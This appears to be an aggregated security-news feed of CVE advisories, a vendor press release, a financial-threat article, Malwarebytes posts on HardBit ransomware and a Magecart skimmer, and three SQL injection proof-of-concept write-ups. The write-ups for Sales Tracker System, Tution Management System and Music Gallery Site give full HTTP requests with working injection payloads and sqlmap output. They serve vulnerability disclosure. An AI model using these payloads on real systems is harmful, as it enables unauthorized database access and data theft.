The mono package before 6.8.0.105+dfsg-3.3 for Debian allows arbitrary code execution because the application/x-ms-dos-executable MIME type is associated with an un-sandboxed Mono CLR interpreter.

CVE-2023-26314: #972146 - /usr/share/applications/mono-runtime-common.desktop: should not handle MIME type by executing arbitrary code (CVE-2023-26314)

In affected versions of Octopus Deploy it is possible to upload a zipbomb file as a task which results in Denial of Service

Summary

Zipbomb resource exhaustion in Octopus Server (CVE-2022-2883)

Advisory Number

2023-01

Discovery Date

05 Nov 2022

Patch Release Date

06 Feb 2023

Advisory Release Date

14 Feb 2023

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2883

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.4.8423 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to upload a zipbomb file as a task which results in Denial of Service

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x.x, 2019.x.x, 2020.x.x, 2021.x.x versions
*   All 2022.1.x, 2022.2.x versions
*   All 2022.3.x versions before 2022.3.11043
*   All 2022.4.x versions before 2022.4.8401

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.3.11043
*   2022.4.8401

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.4.8423). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.4.8423):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.3.11043 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.3.11043 or greater

2022.1.x, 2022.2.x

2022.3.11043 or greater

2022.3.x

2022.3.11043 or greater

2022.4.x

2022.4.8401 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2883, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2883: Security Advisory 2023-02

VMware Carbon Black App Control 8.7.x prior to 8.7.8, 8.8.x prior to 8.8.6, and 8.9.x.prior to 8.9.4 contain an injection vulnerability. A malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.

Advisory ID: VMSA-2023-0004

CVSSv3 Range: 9.1

Issue Date: 2023-02-21

Updated On: 2023-02-21 (Initial Advisory)

CVE(s): CVE-2023-20858

Synopsis: VMware Carbon Black App Control updates address an injection vulnerability (CVE-2023-20858)

****1\. Impacted Products****

*   VMware Carbon Black App Control (App Control)

****2\. Introduction****

An injection vulnerability affecting VMware Carbon Black App Control was privately reported to VMware. Updates are available to address this vulnerability in affected VMware products.  

****3\. Injection Vulnerability (CVE-2023-20858)****

VMware Carbon Black App Control contains an injection vulnerability. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.1.

A malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.

To remediate CVE-2023-20858 update to the versions listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Jari Jääskelä (@JJaaskela) for reporting this vulnerability to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

App Control

8.9.x

Windows

CVE-2023-20858

9.1

critical

8.9.4

None

None

App Control

8.8.x

Windows

CVE-2023-20858

9.1

critical

8.8.6

None

None

App Control

8.7.x

Windows

CVE-2023-20858

9.1

critical

8.7.8

None

None

****4\. References****

****5\. Change Log****

**2023-02-21 VMSA-2023-0004  
**Initial security advisory.

****6\. Contact****

CVE-2023-20858: VMSA-2023-0004

Latest threat prevention module helps resource-strapped security teams block unsafe, untrusted or vulnerable applications.

**SANTA CLARA, Calif.****,** **Feb. 21, 2023** **/PRNewswire/ --** Malwarebytes™, a global leader in real-time cyberprotection, today announced the addition of Malwarebytes Application Block to its Nebula and OneView endpoint protection platforms. The new threat prevention module helps resource-strained security teams quickly guard against unsafe third-party Windows applications, meet key compliance requirements and encourage productivity without adding management complexity. 

Third-party apps pose a serious security threat to businesses with limited IT resources and expertise. Vulnerabilities in Android applications have led to more than one million malicious application downloads, with researchers frequently uncovering malware-ridden applications on Google Play. Since 63% of workers use unauthorized applications, businesses of all sizes can be vulnerable to phishing schemes or exploitation – two of the four leading ways attackers gain access to a company's network.1

For the over 1.4 billion monthly active Windows 10 or Windows 11 devices2, Application Block allows IT admins to blacklist or restrict access to outdated, untrusted, or unsafe applications with known vulnerabilities or that lack the latest patches. IT security teams can use Application Block's dashboard to understand what applications are being blocked in real-time, as well as its reporting features to meet key compliance requirements and navigate increasing data protection regulations.

"Third-party applications are essential to productivity, but they also greatly expand organizations' attack surfaces," said Malwarebytes Chief Product Officer, Mark Strassman. "Malwarebytes Application Block can be near-instantly deployed, helping resource-strapped organizations to effectively manage secure access to third-party apps and add another protective layer without added complexity."

Malwarebytes Application Block is immediately available for Windows endpoints within the Malwarebytes Nebula and OneView platforms to help organizations:

*   **Improve Application Security** – Stop the execution of vulnerable applications so that companies can test and apply updates or block the vulnerable application until a patch is available.
*   **Encourage Employee Productivity** – Restrict access to non-business-related applications, maximizing efficiency and saving resources.
*   **Satisfy Compliance Regulations** – Reduce the risk of failing to comply with data protection regulations such as GDPR, CIPA or HIPAA.

To read more about the latest threats and cyber protection strategies, visit our newsroom, or follow us on Facebook, Instagram, LinkedIn, TikTok and Twitter.

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions and its world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe. The effectiveness and ease-of-use of Malwarebytes solutions are consistently recognized by independent third parties including MITRE Engenuity, MRG Effitas, AVLAB, AV-TEST (consumer and business), Gartner Peer Insights, G2 Crowd and CNET. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Malwarebytes Expands Platform With New Application Block Capabilities

Nation-state adversaries, new reporting regulations, and a fast-paced threat landscape mean that financial services and technology firms need to bolster their security posture.

The cybersecurity landscape for financial institutions and finance technology (fintech) has changed dramatically in the past few years, and 2023 will likely be no different.

In 2022, for example, distributed denial-of-service (DDoS) attacks targeting financial firms increased by 22% worldwide, compared to the previous year, according to a joint report published by the Financial Services Information Sharing and Analysis Center (FS-ISAC) and Internet infrastructure firm Akamai. Financial institutions in Europe saw an even greater jump, with 73% more DDoS attacks, the report stated.

While many businesses wave aside DDoS attacks as noise on the Internet, such tactics are increasingly used as a diversion tool, especially with geopolitical tensions running high, as they have since Russia invaded Ukraine, says Teresa Walsh, global head of intelligence at the FS-ISAC.

Financial institutions need to gauge "the potential for DDoS attacks to be used as a decoy for more damaging cyber activities, such as the infiltration of systems and the installation of malware," she says. "While DDoS attacks themselves tend to not cause large windows of downtime due to a wide array of standard defensive measures available to financial institutions, the same practices are not as readily available for DDoS used as a smokescreen."

The increase in DDoS attacks is just one area where financial services and fintech firms face an increasing level of threats. Driven by nation-state groups taking sides in the Russia-Ukraine war, ransomware is becoming more destructive, while attacks on financial data are increasingly a problem facing all types of organizations. In addition, attackers are using cybercriminal services — such as access brokers and ransomware-as-a-service — leading to more specialized and sophisticated operations against financial institutions and cryptocurrency services.

Regulations are also changing the cybersecurity landscape for financial firms, which must now — as of May 1, 2022 — disclose cyber incidents within 36 hours to their regulators in the United States, if the incident could impact the US banking system. At the same time, the recent ransomware attack on derivative service provider ION Group and the ongoing popularity of business email compromise (BEC) schemes shows the brittleness of the financial supply chain.

While financial firms have some of the best cybersecurity, attackers continue to find ways to succeed, says Tom Kellermann, senior vice president of cyber strategy at Contrast Security.

"They have invested much more than other industries in cybersecurity, they have the best technologies, and they have some of the very best people in the world," he says. "But they're being hunted by the most organized sophisticated cybercrime cartels in the world, coupled with intelligence services from rogue nation states who want to hack the sector — not just for the purposes of economic espionage, but to help offset economic sanctions."

**Geopolitics & Cybercriminal Specialization Spur Changes**

Two major forces are changing the overall cybersecurity landscape. Russia's invasion of Ukraine has led to a parallel cyberwar that, unlike the physical conflict, has spilled outside the boundaries of those two nations. The Russia-Ukraine conflict has led to a greater number of attackers focusing on destructive operations, in addition to stealing funds or deploying ransomware for profit.

More than half (54%) of financial firms interviewed by Contrast Security considered cyberattacks from Russia as the top threat, with a quarter naming North Korea as their top worry.

"The Russians are most concerning to these institutions because Russian cybercrime cartels are far more knowledgeable of, not only the financial sector in terms of how it operates and what is most valuable ... but also the interdependencies that exists in the sector," Kellermann says. "Which is why you're seeing that surge of attacks against APIs and an increase in island-hopping and watering hole attacks."

Overall, cyberattacks in the sector have become more sophisticated, with many traditionally standalone attacks now being used as part of more complex operations, with "as-a-service" models replacing some parts of the attack chain. Access brokers have become far more popular, as demonstrated by the growth of the Emotet malware-as-a-service operation, cybersecurity firm Kaspersky said in a list of cyberthreats targeting the financial services industry.

"These access broker cybercriminal groups, they are basically hacking as much as they can and then they are selling the access to us to anyone that wants to buy," Marc Rivero, a senior security research at Kaspersky, said during a presentation on the company's predications. "That allows other groups to spend less time compromising their targets."

Even company finance and accounting departments are seeing increased risks. More than a third of organizations (35%) had their accounting and financial data targeted by attackers in a cyber event in the past 12 months, and nearly half (49%) expect an increase in similar attacks in the next year, according to a survey conducted by consultancy Deloitte.

Increasingly, attackers are focusing on compromising financial transactions between corporate users and financial institutions, and between financial firms and their vendors, said Daniel Soo, a principal with Deloitte's risk and financial advisory group.

"These attackers are becoming a little bit more targeted, where they can get into some financials and see what's underlying each of these firms," he says. "And it's a little bit frightening, because by peering into the financials, you can learn a lot about organizations."

**More Regulations, Compliance Risks**

Financial institutions also have to deal with increasing regulations across multiple jurisdictions. Data breaches must be reported to European authorities to satisfy the General Data Protection Regulation (GDPR), and the United States is increasing oversight at both the state — led by California — and federal level. The American Data Privacy Protection Act (ADPPA) did not pass through Congress, but federal standards continue to progress, including a 36-hour reporting requirement for financial firms.

The increasing regulations means that any financial institution needs to build a holistic cyber resilience program to have the flexibility to meet changing regulations, particularly multinational institutions, says FS-ISAC's Walsh.

"This has been a major priority for many years now, so we expect few institutions to have to make dramatic changes to their cyber management or reporting infrastructure in response to regulation," she says.

Kellermann adds, "Plausible deniability is dead. They are just going to have to report now."

**Improvement Needed in Financial Security Posture**

While financial services firms typically lead the pack as adopters of cybersecurity, the fast pace of innovation in payment technologies requires financial institutions to quickly move to secure those technologies, according to Contrast Security's survey. In 2023, 72% of financial organizations plan to increase their investment in the security of their applications, while 64% mandated cybersecurity requirements for their vendors, the survey found.

In addition, the definition of cybersecurity and cybercrime is expanding to new categories. In a report released in January 2023, the Financial Industry Regulatory Authority (FINRA) added a new section for financial crimes in its cybersecurity and technology governance section.

For the most part, the financial industry needs to make its information infrastructure and processes more resilient — not only in resisting an attack, but also in the organization's ability to recover following an attack, says Deloitte's Soo. Currently, only 26% of companies have a process in place to estimate damages from specific types of cyber incidents, with another 17% aiming to put one in place in the next 12 months, Deloitte stated in its report.

"There's certainly going to be a disruption often related to some sort of cyber incident, and resilience is very much around 'how do you recover quickly in a very structured way'," Soo says. "How can you recover and how can you limit the blast radius, \[so\] you localize any type of damage?"

Cyberthreats, Regulations Mount for Financial Industry

Sales Tracker System version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Authenticated SQL Injection on Sales Tracker System# Google Dork: NA# Date: 21/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Link: [download link if available]# Version: 1.0# Tested on: Windows 11```GET /php-sts/admin/products/view_product.php?id=5' HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://localhost/php-sts/admin/?page=productsCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin```# PayloadParameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=5' AND 3888=3888-- vxtB    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=5' OR (SELECT 7013 FROM(SELECTCOUNT(*),CONCAT(0x7162767671,(SELECT(ELT(7013=7013,1))),0x7170717671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ikkJ    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=5' AND (SELECT 2482 FROM (SELECT(SLEEP(5)))dHEy)-- ehsZ---[15:47:48] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Sales Tracker System 1.0 SQL Injection

SQL Injection Vulnerability in tanujpatra228 Tution Management System (TMS) via the email parameter to processes/student_login.process.php.

**SQL Injection Vulnerability at student\_login.process.php**

There is a SQL Injection Vulnerability at student_login.process.php.When a student try to login in to the student dashboard.There is a SQL Injection Vulnerability at the param $id

The Vulnerabilty Loation is bellow.

Here is the PoC

POST /tms/processes/student\_login.process.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 71
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/tms/login\_stud.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

email=ddd'and 1=(updatexml(1,concat(0x3a,(select user())),1))--+&pwd=dd

CVE-2022-45677: temp/README.md at main · yukar1z0e/temp

A vulnerability classified as critical has been found in SourceCodester Music Gallery Site 1.0. This affects an unknown part of the file music_list.php of the component GET Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221553 was assigned to this vulnerability.

**Music Gallery Site - SQL Injection on page music\_list.php and parameter cid is vulnerable, application url is (?page=music\_list&cid=?).**

> Any remote attacker can access this page to exploit the vulnerbility.

**Date:**

> 21 February 2023

**Author Name:**

> Muhammad Navaid Zafar Ansari

**Author Email:**

> navaidnasari@hotmail.co.uk

**Vendor Homepage:**

> https://www.sourcecodester.com

**Software Link:**

> Music Gallery Site

**Version:**

> v 1.0

**SQL Injection**

> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.

**Affected Page:**

> music\_list.php On this page cid parameter is vulnerable to SQL Injection Attack URL of the vulnerable parameter is: /?page=music\_list&cid=\*

**Description:**

> The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.

**Proof of Concept:**

> Following steps are involved:

1.  Go to the category menu and click on view category.
2.  In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music\_list&cid=4\*)

**Request:**

    GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    

**Response:**

**Recommendation:**

> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:

    Example Code: 
    $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");
    $sql->bindparam(':id', $cid);
    $sql->execute();
    $row = $sql->fetch(PDO::FETCH_ASSOC);
    

Thank you for reading

CVE-2023-0938: CVE_Demo/Music Gallery Site - SQL Injection 1.md at main · navaidzansari/CVE_Demo

Categories: News
Tags: hardbit

Tags:  ransomware

Tags:  infection

Tags:  insurance

Tags:  cyber

Tags:  negotiation

Tags:  encrypted

Tags:  locked

Tags:  network

We take a look at a ransomware infection which uses a novel approach to payments: asking for the victim's insurance details.



(Read more...)




The post HardBit ransomware tailors ransom to fit your cyber insurance payout appeared first on Malwarebytes Labs.

Posted: February 21, 2023 by

Ransomware authors are wading into the cybersecurity insurance debate in a somewhat peculiar way. Specifically: urging victims to disclose details of their insurance contract, in order to tailor a ransom which will be beneficial to the company under attack.

**HardBit 2.0: dismantling a device piece by piece**

The ransomware, called HardBit 2.0, has been in circulation since sometime around November last year. Although there is no specific information as to how it arrives on a network, once it gets there is performs typical ransomware operations:

*   Encrypts files, branding them with the file’s custom logo
*   Gathers system/network data
*   Reduces overall security of affected systems
*   Disables recovery options and tamper protection, turns off multiple Windows Defender features, and interferes with several other security features including real time monitoring and Windows services related to backups like the Volume Shadow Copy Service.

**What does the encryption warning message say?**

HardBit 2.0 encrypts files and presents the following infection message on compromised desktops:

> All your important files are stolen and encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send your ID for us.
> 
> Our contact information is written in the file “How to restore your files”.
> 
> You have 48 hours to contact or pay us. After that, you will have to pay double.
> 
> Please do not touch the key written under the help file in any way.

Just like Mortal Kombat ransomware, the attackers ask those who are hijacked to use Tox Messenger to communicate. The authors claim to steal data as well as encrypt it, although there’s no dedicated leak site to exploit this particular angle. In this case, it may be that most organisations targeted by the group would be too distracted by their “unique” approach to ransom demands to care.

**A helping hand?**

We’ve seen ransomware authors claim to care about their victims in the past. Some ransomware groups will remove themselves from impacted entities such as hospitals or critical services once those stories go public. Your mileage may vary with regard to whether this is a face saving PR move, or if they genuinely care about having going a little bit too far.

Here, they’re going out of their way to “help” by quizzing victims about the specifics of their cyber insurance policy. According to Varonis, there’s no outright demand for Bitcoin or another form of cryptocurrency. In its place is a long, rambling ransom note.

The note explains at length that their final ransom demand will be adjusted to ensure it falls inside of the insurance claim requirements. It paints the insurer as some sort of bad actor wanting to withhold money from the victim. If the scammers are told in private what the insurance total is, they’ll be able to ensure their demand for money is

**A)** at the top end limit of the ransom payout scale provided and

**B)** does not go _past_ this limit, so the affected company receives every cent they've paid out. This is designed to be a mutually beneficial deal for both parties, as victim and attacker will receive as much as they possibly can.

There is, of course, no guarantee that the ransomware authors won’t use the reveal of potentially confidential insurance information against the victim at a later date. Anyone presented with this choice is really the living breathing definition of crossing some fingers and hoping for the best.

Malwarebytes detects this threat as Trojan.Crypt.Generic.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Write an incident response plan**. The period after a ransomware attack can be chaotic. Make a plan that outlines how you'll isolate an outbreak, communicate with stakeholders, and restore your systems.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

HardBit ransomware tailors ransom to fit your cyber insurance payout

Categories: Threat Intelligence
Magecart threat actors continue to go after e-commerce sites while also collecting data points from fake customers.



(Read more...)




The post Multilingual skimmer fingerprints 'secret shoppers' via Cloudflare endpoint API appeared first on Malwarebytes Labs.

One important aspect of data theft in criminal markets revolves around the authenticity of the data that is being resold. There are different services that exist to vet such things as credit card numbers so that buyers can purchase with confidence.

Criminals are also very aware that anyone and in particular security researchers may want to interfere with their operations. Filling up phishing pages with junk data is a sport of its own, although it may also be counterproductive at times. Using special cards for tracing purposes can also be used by defenders to follow the money.

We recently spotted a Magecart skimmer that collects the current victim's IP address and browser user-agent in addition to their email, address, phone number and credit card data. Because the victim already filled in their home address, we believe this is a fingerprinting effort much like what is done in traditional malware campaigns.

**Skimmer targets various geolocations**

The skimmer uses iframes that are loaded if the current page is the checkout and if the browser's local storage does not include a font item (this is equivalent to using cookies to detect returning visitors).

_Figure 1: Skimmer checking for address bar and inserting iframe_

The final rendering is identical to official payment platforms and does not give anything away:

_Figure 2: Fake payment forms injected by skimmer_

**Fingerprinting via Cloudflare API**

The underlying code will scrape everything from the customer's contact and payment forms. This is something that is often overlooked when talking about digital skimmers but yet is extremely important. While financial institutions can reissue you a new card in the mail, the information the criminals have collected is equivalent to a data breach and can be reused for other types of fraud later on.

_Figure 3: Skimmer data collection and fingerprinting_

One thing we noticed that was a little unusual, is code that queries the legitimate Cloudflare endpoint API and parses out the results specifically for two things: the user's current IP address and browser's user-agent. A user-agent string might look something like this:

_Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36_

From this you can determine the user is running Windows 10 (64 bit version) with Chrome version 110.

_Figure 4: Stolen data including IP address and user-agent string_

It's worth noting that this is done _**after**_ credit card data has already been collected and not before. It is quite common to check the user-agent string upon visiting a web page to determine whether a particular victim fits the target profile or to adapt the content to a mobile or desktop experience.

Since the skimmer already grabbed the shopper's city, postal code and country it's unlikely that the IP address would be of much use beyond that. We believe the threat actors are likely collecting IP addresses and user-agent strings for quality checks and monitoring invalid users such as bots and security researchers.

**Conclusion**

We observe a number credit card skimmers targeting e-commerce platforms such as Magento and WordPress/WooCommerce. Online merchants need to be aware of this threat and take appropriate measures to not only be compliant but also to make it much harder to be compromised in the first place. Since we mentioned Cloudflare in this post, it's worth noting that the company provides a service to businesses called Page Shield, that helps keep visitors safe through malicious third-party libraries.

We continue to track and report skimming infrastructure in order to protect our users via our Malwarebytes for consumers and businesses, as well as our Browser Guard extension.

**Indicators of Compromise**

gtag-analytics\[.\]com

gtag-analytics\[.\]com/analytics/15798/script.js?key=  
gtag-analytics\[.\]com/analytics/18452/script.js?key=  
gtag-analytics\[.\]com/analytics/25198/script.js?key=  
gtag-analytics\[.\]com/analytics/31826/script.js?key=  
gtag-analytics\[.\]com/analytics/32444/script.js?key=  
gtag-analytics\[.\]com/analytics/34515/script.js?key=  
gtag-analytics\[.\]com/analytics/65526/script.js?key=

gogletags\[.\]click

Tag

#windows